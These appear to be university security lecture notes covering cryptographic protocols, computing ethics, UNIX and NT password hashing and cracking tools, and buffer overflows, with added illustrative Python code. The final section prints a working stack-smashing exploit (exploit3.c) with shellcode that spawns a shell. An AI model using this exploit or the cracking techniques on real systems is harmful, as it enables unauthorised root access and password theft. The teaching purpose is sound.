Example with Alice, Bob and Charles (!), who vote and then encrypt and sign a series of messages using public-key encryption. For example, if Alice votes $v_A$, then she will broadcast to all other voters the message

$R_A(R_B(R_C(E_A(E_B(E_C(v_A))))))$

where $R_A$ is a random encoding function which adds a random string to a message before encrypting it with A’s public key, and $E_A$ is public key encryption with A’s public key.


Voting protocols

Each voter then signs the message and decrypts one level of the encryption.

At the end of the protocol, each voter has a complete signed audit trail and is ensured of the validity of the vote.


Tossing a coin

Alice and Bob want to toss a coin

Alice calculates two primes p, q and calculates N = pq, sends N to Bob. $N = 35 = 5 * 7$

If Bob can factorize the number, then Bob wins a coin toss.

Bob selects random x, and sends $x^2 \bmod N = y$ to Alice. $y = 31^2 \bmod 35 = 16$


Tossing a coin

Alice calculates the four square roots of 16:

• $4^2 \bmod 35 = 16$

• $31^2 \bmod 35 = 16$

• $24^2 \bmod 35 = 16$

• $11^2 \bmod 35 = 16$

This is easy for Alice, as she knows the prime factors of N. She then sends one of these back to Bob.


Tossing a coin

If Bob receives x or −x, then he learns nothing, but

if Bob receives either of the other values, he can add this to x, and then find the GCD of the result with N:

GCD(24 + 31, 35) = GCD(55, 35) = 5

Alice is unable to tell she has divulged the factor
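
The whole toss with the slide's numbers (N = 35, x = 31), as an added example that is not part of the original notes. Alice's roots modulo each prime are found by plain search, which only works for toy primes like these; the function names are this example's own.

```python
# Added example: coin toss by square roots modulo N = p*q. Requires Python 3.8+.
from math import gcd
import secrets


def square_roots(y, p, q):
    """Alice's step: every r in [0, N) with r*r % N == y, where N = p*q.
    Roots modulo p and modulo q are combined with the Chinese Remainder Theorem."""
    N = p * q
    roots_p = [r for r in range(p) if r * r % p == y % p]
    roots_q = [r for r in range(q) if r * r % q == y % q]
    p_inv = pow(p, -1, q)                       # p^-1 mod q
    return sorted({(rp + p * ((rq - rp) * p_inv % q)) % N
                   for rp in roots_p for rq in roots_q})


def bob_factor(x, reply, N):
    """Bob's step: gcd(x + reply, N) is a proper factor unless reply is x or -x."""
    g = gcd(x + reply, N)
    return g if 1 < g < N else None


def outcomes(p, q, x):
    """What Bob learns from each of the replies Alice could send."""
    N = p * q
    return {r: bob_factor(x, r, N) for r in square_roots(x * x % N, p, q)}


def toss(p, q):
    """One run of the protocol; returns True when Bob ends up with a factor of N."""
    N = p * q
    x = secrets.randbelow(N - 1) + 1
    while gcd(x, N) != 1:                       # Bob needs x coprime to N
        x = secrets.randbelow(N - 1) + 1
    y = x * x % N                               # the only thing Alice sees
    reply = secrets.choice(square_roots(y, p, q))
    return bob_factor(x, reply, N) is not None


if __name__ == "__main__":
    print(square_roots(16, 5, 7))               # the four roots from the slide
    print(outcomes(5, 7, 31))                   # two replies give a factor, two do not
    wins = sum(toss(5, 7) for _ in range(10000))
    print("Bob won", wins, "of 10000 tosses")
```
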


Oblivious transfer

In an oblivious transfer, randomness is used to convince participants of the fairness of some transaction

In a coin-tossing example, Alice knows the prime factors of a large number, and if Bob can factorize the number, then Bob wins a coin toss.

A protocol allows Alice to either divulge one of the prime factors to Bob, or not, with equal probability.

Alice is unable to tell if she has divulged the factor, and so the coin toss is fair.


Contract signing

Signing contracts can be difficult.

If one party signs the contract, the other may not. We have one party bound by the contract, and the other not.

In addition, both may sign, and then one may say “I didn’t sign any contract!” afterwards.


Contract signing

Oblivious transfer used for contract-signing where

• Up to a certain point neither party is bound

• After that point both parties are bound

• Either party can prove that the other party signed

Alice and Bob exchange signed messages, agreeing to be bound by a contract with ever-increasing probability


Contract signing

In the event of early termination of the contract, either party can take the messages they have to an adjudicator, who chooses a random probability value (42% say) before looking at the messages.

If both messages are over 42% then both parties are bound.

If less, then both parties are free.


Chapter 9

Lecture 9 - System (in)security


Administration

Results are out - please check.

Assignment 1

hardcopy to tutor or me, email softcopy to me.

Assignment 2 ... better get going.


Last session

• Kerberos

• Voting

• Contract signing


This session

• Ethics and computing

• Organizations and standards

• UNIX passwords

• NT passwords


Stranger danger...

One of my sons was taught stranger-danger at his school. We were asked to quiz him afterwards, so we asked him if he should accept a lift in a car with a stranger. He immediately replied “No way!”. We then asked: “What if he offered you sweets?”, but he still replied “No way!”. Finally we asked: “Why not?”, to which he replied “Because you might not get any!”


Ethics

Moral development stages:

Stage 1: Obedience and punishment

...

Stage 6: Individual principles of conscience - an orientation not only toward existing social rules, but also toward the conscience as a directing agent, mutual trust and respect, and principles of moral choice involving logical universalities and consistency. If one acts otherwise, self-condemnation and guilt result.


Ethics

It is my expectation, and requirement, that you are able to maturely evaluate rights and wrongs.

In these sections of the course, I will be outlining systems which demonstrate poor cryptographic techniques, and as a result, can be defeated.

A more cynical view might be that I am teaching hacking

...this is not my intent...


Ethics and computing

No new ethical dilemmas... Perhaps the only significant difference is that the computer crimes are so easy.

Software duplication: = theft.

Using information: = insider trading.

E-mail abuse: = abuse.


Network administrator’s dilemma

Network administrators often come to learn things about their 'clients'.

Without asking the client, they should not make use of that information.

The network administrator’s dilemma: How to control bad-guys without trampling over rights.


Professional codes of ethics

Most professional bodies[13] have formal written codes of ethics.

The computer industry has yet to develop a standard code of conduct.

If computer crime continues to rise, codes may be imposed on it.

[13] For example: Medical boards.


ACS code of ethics

1. I will serve the interests of my clients and employers, my employees and students, and the community generally, as matters of no less priority than the interests of myself or my colleagues....

Within a general framework of ethical and moral responsibility, codes such as this one can help clarify grey areas of concern.


Insecurity - threats are real

For example:

• Pentagon machines were repeatedly corrupted by unknown intruders during the Gulf war. The intruders appeared to be doing it as part of a contest.

• German hackers demonstrated on TV a method of transferring money into their own accounts using ActiveX controls downloaded to an unsuspecting person’s machine.

• Estimates of computer theft in the US range from $1 to $30 billion/year - most of which goes unreported.


Taxonomy of insecurity?

Each new attack adds new levels to the structure:

• physical insecurity, and

• password insecurity

Some of the security of modern systems is provided through cryptographic techniques (particularly password storage), the subject today.


Non-cryptographic cracking

Misconfiguration: If excessive permissions exist on certain directories and files, these can lead to gaining higher levels of access. For example, on a UNIX system, if /dev/kmem is writable it is possible to rewrite your UID to match root’s.

Poor SUID: Sometimes there are scripts (shell or Perl) that perform certain tasks and run as root. If the scripts are writable by you, you can edit them and run them.


Non-cryptographic cracking

Buffer overflow: Buffer overflows are typically used to spawn root shells from a (server) process running as root.

Race conditions: A race condition is when a program creates a short opportunity for attack by opening a small window of vulnerability. For example, a program that alters a sensitive file might use a temporary backup copy of the file during its alteration.


Non-cryptographic cracking

Poor temporary files: Many programs create temporary files while they run. If a program runs as root and is not careful about where it puts its temporary files and what permissions these files have, it might be possible to use links to create root-owned files.

Attacks using these methods can be launched locally on the target machine, or often remotely, by exploiting services with loopholes.
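The temporary-file problem described above, next to a hardened writer, as an added example that is not part of the original notes. Everything happens inside a private scratch directory; the file names are constructed stand-ins for a predictable /tmp name and a protected file.

```python
import os
import stat
import tempfile


def write_tmp_naive(path, data):
    """The careless pattern: a predictable name opened with plain
    create-or-truncate semantics, which follows an existing symlink."""
    with open(path, "w") as fh:
        fh.write(data)


def write_tmp_safe(path, data):
    """Refuse to reuse anything that already exists at `path`.

    O_EXCL makes creation fail if the name exists (a symlink included),
    O_NOFOLLOW refuses a symlink as the final path component, and
    mode 0o600 keeps other users away from the file."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "w") as fh:
        fh.write(data)


def demo():
    """Run both writers against a pre-existing link (constructed scenario)."""
    results = {}
    with tempfile.TemporaryDirectory() as scratch:
        protected = os.path.join(scratch, "protected.conf")  # stand-in for a root-owned file
        predictable = os.path.join(scratch, "prog.tmp")      # stand-in for /tmp/prog.tmp
        with open(protected, "w") as fh:
            fh.write("original contents\n")

        # A link already sits at the predictable temporary name.
        os.symlink(protected, predictable)

        write_tmp_naive(predictable, "scratch data\n")
        with open(protected) as fh:
            results["naive_clobbered_target"] = fh.read() == "scratch data\n"

        # Restore the protected file, then try the hardened writer.
        with open(protected, "w") as fh:
            fh.write("original contents\n")
        try:
            write_tmp_safe(predictable, "scratch data\n")
            results["safe_refused"] = False
        except FileExistsError:
            results["safe_refused"] = True
        with open(protected) as fh:
            results["target_intact_after_safe"] = fh.read() == "original contents\n"

        # Preferred in practice: let the library choose an unpredictable name.
        fd, name = tempfile.mkstemp(dir=scratch)
        os.close(fd)
        results["mkstemp_mode"] = stat.S_IMODE(os.stat(name).st_mode)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```
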


Protection

Can you protect yourself against attacks?

• Hack/crack yourself:

• Be vigilant:

• Reduce reliance:

• Use more secure systems:

• Update systems:

Finally: “It’s not the end of the world!”


This session

• Ethics and computing

• Organizations and standards

• UNIX passwords

• NT passwords


Computer Emergency Response Team

The CERT Coordination Center is the organization that grew from the computer emergency response team formed by the Defense Advanced Research Projects Agency (DARPA) in November 1988 in response to the needs identified during the Internet worm incident. The CERT charter is to work with the Internet community to facilitate its response to computer security events involving Internet hosts, to take proactive steps to raise the community’s awareness of computer security issues, and to conduct research targeted at improving the security of existing systems.


CERT

If you are ever involved in a computer security incident it is useful to get in touch with CERT.

They provide incident reports and advisories, and can liaise with other system administration people if the attack on your system comes from outside your organization.


CERT Incident Note IN-99-04

Here is an excerpt from an incident report:

Similar Attacks Using Various RPC Services

Thursday, July 22, 1999

Overview

We have recently received an increasing number of reports that intruders are using similar methods to compromise systems. We have seen intruders exploit three different RPC service vulnerabilities; however, similar artifacts have been found on compromised systems.

...


SIGINT

Signals Intelligence (SIGINT) broke the Japanese military code and learned of plans to invade Midway Island.

In 1943 they began the VENONA project to examine encrypted Soviet diplomatic communications.

The messages were double-encrypted and were extremely difficult to crack.

Almost all of the US KGB messages in 1944 and 1945 were broken between 1947 and 1952.


NSA - National Security Agency

Successor of SIGINT

The National Security Agency is the USA’s cryptologic organization.

It coordinates, directs, and performs highly specialized activities to protect U.S. information systems and produce foreign intelligence information.


NSA - National Security Agency

NSA employs the country’s premier codemakers and codebreakers.

It is said to be the largest employer of mathematicians in the United States and perhaps the world.


Rainbow documents

The NSA created various documents describing the criteria for evaluating the security behaviour of machines.

These criteria were published in a series of documents with brightly coloured covers, and hence became known as the Rainbow series. (red book, yellow book...)


C2 security

DOD 5200.28-STD - “Department of Defense Trusted Computer System Evaluation Criteria”:

• To provide a standard to manufacturers (for security features related to confidentiality)...

• To provide DoD components with a metric with which to evaluate the degree of trust...

• To provide a basis for specifying security requirements in acquisition specifications.


C2 security example

The TCB[14] shall require users to identify themselves to it before beginning to perform any other actions that the TCB is expected to mediate.

Furthermore, the TCB shall use a protected mechanism (e.g., passwords) to authenticate the user’s identity.

[14] Trusted Computing Base.


Microsoft and C2

Windows NT Workstation vs 3.5 with U.S. Service Pack 3 was the first Microsoft product that has completed C2 testing, and is only certified if using the same hardware, and installed software, and does not include any network connection. The NT utility c2config.exe sets up an NT system to pass the C2 tests.

The 1998 attacks on the Pentagon involved theft and modification of data, as well as denial-of-service. The attacked machines were C2-secure Windows NT machines.


UNIX and C2

Many UNIX systems have also got C2 certification, and come configured this way from the manufacturer.

There are numerous examples of hacked UNIX systems found on the Internet. In 1996, a site I managed in New Zealand was the target of a malicious attack by intruders from Australia and Belgium.

Given all this, C2 certification is probably not a good guide as to the security of your system.


This session

• Ethics and computing

• Organizations and standards

• UNIX passwords

• NT passwords


Password security

Morris and Thompson article:

http://citeseer.nj.nec.com/morris79password.html

Computer generated passwords more predictable than user ones...


UNIX password security

UNIX systems are traditionally open systems, given their background in university environments.

As such, the security on them is often minimal.

It is common for UNIX accounts to be made available relatively freely.

For example, at the MIT Media lab[15] all computers have been password-free until recently.

[15] MIT - home of Kerberos!


UNIX password security

UNIX systems are vulnerable to a wide range of attacks, particularly internal attacks.

All Unix systems have a root account.

This account has a UID and GID of zero, and once root access is obtained on a UNIX system, there is very little that cannot be done.


UNIX accounts

Account passwords are constructed to meet the following requirements:

• Each password has at least six characters.

• Only the first eight characters are significant.


UNIX accounts

There are many other accounts found on Unix systems, not just those for clients:

sysadm - A System V administration account, and

daemon - A daemon process account, and

uucp - The UUCP owner, and

lp - The print spooler owner.

When protecting a UNIX system, we must protect all these accounts - not just root.


UNIX password file

Account information is kept in a file called /etc/passwd.

It normally consists of seven colon-delimited fields, and may look like the following:

hugo:aAbBcJJJx23F55:501:100:Hughs Account:/home/hugo:/bin/tcsh


/etc/passwd fields

hugo: The account or user name.

aAbBcJJJx23F55: A one-way encrypted (hashed) password

501: The UID - unique user number

100: The GID - group number for user.

Hughs Account: Account information.

/home/hugo: The account’s home directory

/bin/tcsh: A program to run when you log in


UNIX passwords

When you log in with your account name and password, the password is encrypted and the resulting hash is compared to the hash stored in the password file.

If they are equal, the system accepts that you’ve typed in the correct password and grants you access.


UNIX passwords

UNIX uses a DES-like algorithm to calculate the encrypted password.

The password is used as the DES key (eight 7-bit characters make a 56 bit DES key) to encrypt a block of binary zeroes.

The result of this encryption is the hash value.

Note: the password is not encrypted, it is the key used to perform the encryption!


UNIX salt

A strengthening feature of UNIX is that it introduces two random characters in the algorithm (the salt).

This ensures that two equal passwords result in two different hashes.

From viewing the UNIX password file you cannot tell if two persons have the same password.


UNIX salt

To prevent crackers from simply encrypting an entire dictionary and then looking up the hash, the salt was added to the algorithm to create a possible 4096 different hashes for a particular password.

This lengthens the cracking time because it becomes a little harder to store an encrypted dictionary online as the encrypted dictionary now would have to take up 4096 times the disk space.

This does not make password cracking harder, just more time consuming.


Crypt code

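Sample crypt code from LINUX uClibc. The code has the following structure:

    /* The two back ends that crypt() chooses between. */
    extern char *md5_crypt(const char *key, const char *salt);
    extern char *des_crypt(const char *key, const char *salt);

    extern char * crypt(const char *key, const char *salt)
    {
        /* Are we supposed to be using the MD5 replacement
         * instead of DES... */
        if (salt[0]=='$' && salt[1]=='1' && salt[2]=='$')
            return md5_crypt(key, salt);
        else
            return des_crypt(key, salt);
    }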


Cracking

It is very time consuming, but given enough time, brute force cracking will get the password.

The hashed passwords are compared with the entry in the /etc/passwd file.

BTW - You cannot try to log in using all the possible passwords, as UNIX systems enforce 10 second timeouts after three consecutive login failures.


Dictionary cracking

Dictionary password cracking is the most popular method for cracking Unix passwords.

The cracking program will take a word list, and one at a time try to crack one or all of the passwords listed in the password file.

Some password crackers will filter and/or mutate:

substitute numbers for certain letters, add prefixes or suffixes, or switch case or order of letters.


Dictionary cracking

A popular cracking utility is called Crack.

Crack can use user-definable rules for word manipulation/mutation to maximize dictionary effectiveness.

Crack merges dictionaries, turns the password files into a sorted list, and generates lists of possible passwords from the merged dictionary or from information gleaned about users from the password file.


/etc/shadow passwords

Once the password hashes are moved to the shadow file, its permissions are changed as follows:

    opo 35# ls -l /etc/shadow
    -r-------- 1 root sys 3429 Aug 20 14:46 /etc/shadow
    opo 36#

These permissions ensure that ordinary users are unable to look at the password hashes, and hence are unable to try dictionary attacks.
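An audit of the seven-field /etc/passwd format and the shadow-file permissions described above, as an added example that is not part of the original notes. The sample file is constructed (only the hugo line comes from the slides), and the function names and finding codes are hypothetical.

```python
from dataclasses import dataclass

# Field values that mean "no usable hash is stored in this field".
SHADOWED_OR_LOCKED = {"x", "*", "!", "!!"}

# Constructed sample, not a real system's file. The hugo line is the one
# shown on the slide; the other lines are made up for the audit.
SAMPLE_PASSWD = """\
root:x:0:0:Super-User:/:/sbin/sh
daemon:x:1:1::/:
sysadm:x:0:0:System V admin:/admin:/sbin/sh
uucp:*:5:5:UUCP owner:/usr/lib/uucp:
lp::71:8:Print spooler owner:/usr/spool/lp:
hugo:aAbBcJJJx23F55:501:100:Hughs Account:/home/hugo:/bin/tcsh
truncated:x:502
"""


@dataclass
class PasswdEntry:
    name: str
    password: str
    uid: int
    gid: int
    info: str
    home: str
    shell: str


def parse_passwd(text):
    """Split each line into the seven colon-delimited fields.

    Returns (entries, bad_line_numbers); malformed lines are reported
    rather than silently skipped."""
    entries, bad_lines = [], []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit() or not fields[3].isdigit():
            bad_lines.append(lineno)
            continue
        name, pw, uid, gid, info, home, shell = fields
        entries.append(PasswdEntry(name, pw, int(uid), int(gid), info, home, shell))
    return entries, bad_lines


def audit_passwd(entries):
    """Flag every account, system accounts included, not just root."""
    findings = []
    for e in entries:
        if e.password == "":
            findings.append((e.name, "EMPTY_PASSWORD"))    # no password needed
        elif e.password not in SHADOWED_OR_LOCKED:
            findings.append((e.name, "HASH_IN_PASSWD"))    # readable by every user
        if e.uid == 0 and e.name != "root":
            findings.append((e.name, "UID0_NOT_ROOT"))     # root-equivalent account
    return findings


def shadow_is_private(mode):
    """True when group and others have no access, as in -r-------- (0o400)."""
    return mode & 0o077 == 0


if __name__ == "__main__":
    parsed, bad = parse_passwd(SAMPLE_PASSWD)
    print("malformed lines:", bad)
    for name, code in audit_passwd(parsed):
        print(name, code)
    print("0o400 private:", shadow_is_private(0o400))
```
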


This session

• Ethics and computing

• Organizations and standards

• UNIX passwords

• NT passwords


Microsoft password security

Two one-way password hashes are stored on NT systems:

• a LanManager hash, and

• a Windows NT hash.

The LanManager hash supports the older LanManager protocol originally used in Windows and OS/2. In an all-NT environment it is desirable to turn off LanManager passwords, as it is easier to crack. The NT method uses a stronger algorithm and allows mixed-cased passwords.


Microsoft password security

The database containing these hashes on an NT system is called the SAM (Security Access Manager).

If you have administrative access[16], the program pwdump can extract the hashes.

[16] Originally, anyone could extract the hashed passwords from the SAM, as Microsoft believed that “if they didn’t tell anyone the algorithms they used, no-one could discover what they had done”. Security through obscurity is not a safe strategy, and Jeremy Allison was able to de-obfuscate the SAM entries relatively quickly.


Microsoft salt

Microsoft does not salt during hash generation, so once a potential password has generated a hash it can be checked against all accounts.

The cracking software takes advantage of this.
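The effect of the salt (the "UNIX salt" slides) compared with an unsalted store (the "Microsoft salt" slide), as an added example that is not part of the original notes. SHA-256 is used as a stand-in one-way function, not DES crypt or the NT hash; all names and sample passwords are constructed.

```python
import hashlib
import secrets
from collections import defaultdict

# The 64 characters a traditional UNIX salt is drawn from: 64 * 64 = 4096 salts.
SALT_ALPHABET = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def toy_hash(password, salt=""):
    """Stand-in one-way function (SHA-256), NOT DES crypt or the NT hash."""
    return hashlib.sha256((salt + password).encode()).hexdigest()[:16]


def store_salted(password, salt=None):
    """UNIX style: two salt characters are chosen and kept in front of the hash."""
    if salt is None:
        salt = "".join(secrets.choice(SALT_ALPHABET) for _ in range(2))
    if len(salt) != 2 or any(c not in SALT_ALPHABET for c in salt):
        raise ValueError("salt must be two characters from SALT_ALPHABET")
    return salt + toy_hash(password, salt)


def store_unsalted(password):
    """No salt: the stored value depends on the password alone."""
    return toy_hash(password)


def check_login(stored, attempt, salted=True):
    """Login check: hash the attempt the same way and compare with the stored value."""
    if salted:
        salt = stored[:2]
        return secrets.compare_digest(stored, salt + toy_hash(attempt, salt))
    return secrets.compare_digest(stored, toy_hash(attempt))


def shared_password_groups(table):
    """Audit helper: groups of accounts whose stored values are identical."""
    groups = defaultdict(list)
    for user, stored in table.items():
        groups[stored].append(user)
    return sorted(sorted(users) for users in groups.values() if len(users) > 1)


def dictionary_table_size(n_words, salted):
    """Entries a precomputed dictionary needs: one per word, times 4096 if salted."""
    return n_words * (len(SALT_ALPHABET) ** 2 if salted else 1)


def demo():
    # Constructed accounts; alice and carol share a password.
    # Fixed salts keep the demonstration repeatable.
    unsalted = {"alice": store_unsalted("letmein"),
                "bob": store_unsalted("s3cret"),
                "carol": store_unsalted("letmein")}
    salted = {"alice": store_salted("letmein", "aA"),
              "bob": store_salted("s3cret", "k9"),
              "carol": store_salted("letmein", "Qz")}
    return {
        "unsalted_shared": shared_password_groups(unsalted),
        "salted_shared": shared_password_groups(salted),
        "salted_login_ok": check_login(salted["carol"], "letmein"),
        "table_sizes": (dictionary_table_size(1_000_000, False),
                        dictionary_table_size(1_000_000, True)),
    }


if __name__ == "__main__":
    print(demo())
```
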


LanManager encryption

LanManager encryption is created by taking the user’s plaintext password, capitalising it, and either truncating to 14 bytes, or padding to 14 bytes with null bytes.

This 14 byte value is used as two 56-bit DES keys to encrypt an eight byte value, forming a 16 byte value which is stored by the server and client.

This value is known as the hashed password.


NT encryption

Windows NT encryption is a higher quality mechanism, consisting of doing an MD4 hash on a Unicode version of the user’s password.

This also produces a 16 byte hash value that is non-reversible.


NT Password security

Note that the LANManager hash is similar to the UNIX level of cryptography

The NT hash is better

But... neither uses strong encryption, and

the network login mechanism has some problems.


Challenge response

[Figure: login network traffic between CLIENT and PDC, with a BAD GUY snooping on it.]


Challenge-response protocol

When a client wishes to use a resource, it first requests a connection and negotiates the protocol that the client and server will use.

In the reply to this request the server generates and appends an 8 byte, random value - this is stored in the server after the reply is sent and is known as the challenge.

It is different for every client connection.


Challenge-response protocol

The client then uses the hashed password (16 byte values described above), appended with 5 null bytes, as three 56 bit DES keys, each of which is used to encrypt the challenge 8 byte value, forming a 24 byte value known as the response.

This calculation is done on both hashes of the user’s password, and both responses are returned to the server, giving two 24 byte values.


Challenge-response protocol

The server then reproduces the above calculation, using its own value of the 16 byte hashed password and the challenge value that it kept during the initial protocol negotiation.

It then checks to see if the 24 byte value it calculates matches the 24 byte value returned to it from the client.

If these values match exactly, then the client knew the correct password and is allowed access.


Challenge-response protocol

There are good points about this:

• The server never knows or stores the cleartext of the user’s password - just the 16 byte hashed values derived from it.

• The cleartext password or 16 byte hashed values are never transmitted over the network - thus increasing security.


Challenge-response protocol

However, there is also a bad side:

• The 16 byte hashed values are a "password equivalent". You cannot derive the user’s password from them, but they can be used in a modified client to gain access to a server.

• The initial protocol negotiation is generally insecure, and can be hijacked in a range of ways. One common hijack involves convincing the server to allow clear-text passwords.
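The challenge-response exchange from the preceding slides with both sides modelled, as an added example that is not part of the original notes. It keeps the byte layout described there (16-byte hash, 5 null bytes, three 7-byte keys, 8-byte challenge, 24-byte response) but uses SHA-256 and HMAC as stand-ins for the real hashes and for DES, and models one of the two hashes; all names are hypothetical.

```python
import hashlib
import hmac
import os


def toy_password_hash(password):
    """Stand-in for the stored 16-byte hashed password (not LanManager or MD4)."""
    return hashlib.sha256(password.encode("utf-16-le")).digest()[:16]


def toy_block_encrypt(key7, block8):
    """Stand-in for one DES encryption: 7-byte key, 8-byte input, 8-byte output."""
    if len(key7) != 7 or len(block8) != 8:
        raise ValueError("expected a 7-byte key and an 8-byte block")
    return hmac.new(key7, block8, hashlib.sha256).digest()[:8]


def compute_response(hash16, challenge8):
    """16-byte hash + 5 null bytes -> three 56-bit keys -> 24-byte response."""
    padded = hash16 + b"\x00" * 5                     # 21 bytes
    keys = [padded[i:i + 7] for i in (0, 7, 14)]      # third key: 2 hash bytes + 5 nulls
    return b"".join(toy_block_encrypt(k, challenge8) for k in keys)


class Server:
    def __init__(self, accounts):
        # Only the hashed values are stored, never the cleartext.
        self.hashes = {user: toy_password_hash(pw) for user, pw in accounts.items()}
        self.pending = {}

    def negotiate(self, conn_id):
        """Reply to a connection request with a fresh random 8-byte challenge."""
        challenge = os.urandom(8)
        self.pending[conn_id] = challenge
        return challenge

    def verify(self, conn_id, user, response):
        challenge = self.pending.pop(conn_id, None)   # each challenge is single use
        stored = self.hashes.get(user)
        if challenge is None or stored is None:
            return False
        return hmac.compare_digest(compute_response(stored, challenge), response)


class Client:
    def __init__(self, user, password):
        self.user = user
        self.hash16 = toy_password_hash(password)     # all the protocol ever needs

    def respond(self, challenge):
        return compute_response(self.hash16, challenge)


def run_exchange():
    server = Server({"hugo": "constructed-password"})  # constructed account
    good = Client("hugo", "constructed-password")
    bad = Client("hugo", "wrong-guess")

    c1 = server.negotiate(1)
    r1 = good.respond(c1)
    accepted = server.verify(1, "hugo", r1)

    rejected = not server.verify(2, "hugo", bad.respond(server.negotiate(2)))

    # A recorded response is useless against the next, different challenge.
    server.negotiate(3)
    replay_rejected = not server.verify(3, "hugo", r1)

    # The stored hash alone produces a valid response: it is a password
    # equivalent, so the hash database needs the same protection as passwords.
    c4 = server.negotiate(4)
    hash_is_equivalent = server.verify(4, "hugo", compute_response(server.hashes["hugo"], c4))

    return {"response_len": len(r1), "accepted": accepted, "rejected": rejected,
            "replay_rejected": replay_rejected, "hash_is_equivalent": hash_is_equivalent}


if __name__ == "__main__":
    print(run_exchange())
```
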


Challenge-response protocol

Despite functionality added to NT to protect against unauthorized access to the SAM, the mechanism is trivially insecure

Both the hashed values can be retrieved using the network sniffer mentioned before, and they are as-good-as passwords.


Attack

Relies on flawed mechanism.

Even without network access, it is possible by various means to access the SAM password hashes, and with network access it is easy.

The hashed values are password equivalents, and may be used directly if you have modified client software.

The attack considered here is the use of either a dictionary, or brute force attack directly on the password hashes (which must be first collected somehow).


Attack

L0phtCrack is a tool for turning Microsoft Lan Manager and NT password hashes back into the original clear text passwords. It may be configured to run in different ways.

Dictionary cracking: L0phtCrack running on a Pentium Pro 200 checked a password file with 100 passwords against an 8 Megabyte (about 1,000,000 word) dictionary file in under one minute.

Brute force: L0phtCrack running on a Pentium Pro 200 checked a password file with 10 passwords using the alpha character set (A-Z) in 26 hours.


Attack time

| Character set size | Size of computation | Relative time taken |
|---|---|---|
| 26 | 8.353 × 10^9 | 1.00 |
| 36 | 8.060 × 10^10 | 9.65 |
| 46 | 4.455 × 10^11 | 53.33 |
| 68 | 6.823 × 10^12 | 816.86 |

So if 26 characters takes 26 hours to complete, a worst-case scenario for 36 characters (A-Z,0-9) would take 250 hours or 10.5 days. A password such as take2asp1r1n would probably be computed in about 7 days.
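The table's figures match the count of all candidate strings of length 1 to 7 over each character set, 7 bytes being the size of each of the two DES keys the 14-byte LanManager value is split into. The following added example (not part of the original notes; function names are hypothetical) recomputes the table from that formula and compares the split search with a password treated as one 14-character unit.

```python
def search_space(charset_size, max_len=7):
    """Number of candidate strings of length 1..max_len over the character set."""
    return sum(charset_size ** k for k in range(1, max_len + 1))


def attack_time_table(sizes=(26, 36, 46, 68), base_hours=26.0):
    """Rows of (charset size, computation size, relative time, worst-case days).

    base_hours is the slide's measurement for the first (A-Z) character set."""
    base = search_space(sizes[0])
    rows = []
    for n in sizes:
        space = search_space(n)
        relative = space / base
        rows.append((n, space, round(relative, 2), round(relative * base_hours / 24, 1)))
    return rows


def split_versus_whole(charset_size):
    """Work for two independent 7-character halves versus one 14-character unit."""
    split = 2 * search_space(charset_size, 7)
    whole = search_space(charset_size, 14)
    return split, whole


if __name__ == "__main__":
    for n, space, relative, days in attack_time_table():
        print(f"{n:>3}  {space:.3e}  {relative:>7.2f}  {days:>7.1f} days")
    split, whole = split_versus_whole(36)
    print(f"36 symbols: split {split:.3e} vs whole {whole:.3e}")
```

The gap between the split and whole figures is the reason the first item of the fix list is to disable LanManager passwords: long passwords add little while each 7-character half can be searched on its own.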


Microsoft base security fix

1. Disable the use of LanManager passwords.

2. Don’t log in over network as administrator

3. Encrypt all network traffic

4. Use long passwords, and all allowable characters

5. Use an alternative login system

6. Use an unsniffable network cabling system.


Chapter 10

Lecture 10 - More (in)security


Last session

• Ethics and computing

• Organizations and standards

• UNIX passwords

• NT passwords


This session

• Buffer overflow attacks

• PkZip attack

• DVDs and the CSS

• SSH and SSL

• PGPfone


Buffer overflow

Most well known compromise of computer systems

One of a general class of problems caused by software that does not check its parameters for extreme values.


Buffer overflow

Examine the way programs use memory.

Presentation based on

http://destroy.net/machines/security/P49-14-Aleph-One


Simple Program

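#include <stdio.h>
#include <string.h>

void main (int argc, char *argv[])
{
    char buffer[512];
    printf ("Argument is %s\n", argv[1]);
    /* No length check: an argument longer than 511 bytes overruns buffer. */
    strcpy (buffer, argv[1]);
}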

CODE LISTING vulnerable.c


Simple Program

When we run it:

[hugh@pnp176-44 programs]$ ./vulnerable test
Argument is test
[hugh@pnp176-44 programs]$ ./vulnerable "A Longer Test"
Argument is A Longer Test
[hugh@pnp176-44 programs]$


Simple program

[Figure: the stack in the computer's memory. Labels: Stack (grows down...), Arguments, Return address, Variables, Buffer (512 bytes).]


Smashing the stack!

[Figure: smashing the stack. Labels: Stack (grows down...), Arguments, Return address, Variables.]


Working and not working!

[hugh@pnp176-44 programs]$ ./vulnerable ddddd


Exploit...

#include <stdlib.h>

#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
#define NOP 0x90

char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp (void)
{
    __asm__ ("movl %esp,%eax");
}

void main (int argc, char *argv[])
{
    char *buff, *ptr;
    long *addr_ptr, addr;
    int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE;
    int i;

    if (argc > 1)
        bsize = atoi (argv[1]);
    if (argc > 2)
        offset = atoi (argv[2]);
    if (!(buff = malloc (bsize))) {
        printf ("Can't allocate memory.\n");
        exit (0);
    }
    addr = get_sp () - offset;
    printf ("Using address: 0x%x\n", addr);
    ptr = buff;
    addr_ptr = (long *) ptr;
    for (i = 0; i < bsize; i += 4)
        *(addr_ptr++) = addr;
    for (i = 0; i < bsize / 2; i++)
        buff[i] = NOP;
    ptr = buff + ((bsize / 2) - (strlen (shellcode) / 2));
    for (i = 0; i < strlen (shellcode); i++)
        *(ptr++) = shellcode[i];
    buff[bsize - 1] = '\0';
    memcpy (buff, "EGG=", 4);
    putenv (buff);
    system ("/bin/bash");
}

CODE LISTING exploit3.c


Exploit

[hugh@pnp176-44 programs]$ ./exploit3 560
Using address: 0xbfffe998
